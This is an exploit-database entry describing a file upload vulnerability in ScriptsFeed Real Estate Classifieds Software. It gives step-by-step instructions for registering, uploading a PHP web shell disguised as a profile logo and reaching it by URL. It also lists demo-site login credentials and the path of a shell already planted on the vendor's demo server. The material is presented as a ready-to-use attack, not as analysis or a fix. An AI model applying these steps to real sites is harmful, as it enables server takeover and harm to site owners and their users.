[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

ScriptsFeed (SF) Real Estate Classifieds Software File Upload Vuln

Author
ZoRLu
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-4169
Category
web applications
Date add
13-11-2008
Platform
unsorted
==================================================================
ScriptsFeed (SF) Real Estate Classifieds Software File Upload Vuln
==================================================================


[~] ScriptsFeed (SF) Real Estate Classifieds Software Remote File Upload
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 13.11.2008
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~]
[~] my bug number now: 39
[~]
[~] my target bug number: 100
[~]
[~] -----------------------------------------------------------


Exploit:

http://localhost/script/re_images/[id]_logo_your_shell.php

you register to site 

register: http://localhost/script/register.php

after you login to site

login: http://localhost/script/login.php

more after you go profile edit

profile: http://localhost/script/profile.php

and you upload your_shell.php right click to your logo and select properties copy link

paste your explorer go your_shell.php

your_shell.php path:

http://localhost/script/re_images/[id]_logo_your_shell.php



rfu for demo:

user: zorlu

passwd: zorlu1

shell path:

http://www.scriptsfeed.com/demos/realtor_web_6/re_images/1226595925_logo_c.php


[~]----------------------------------------------------------------------



#  0day.today [2024-11-15]  #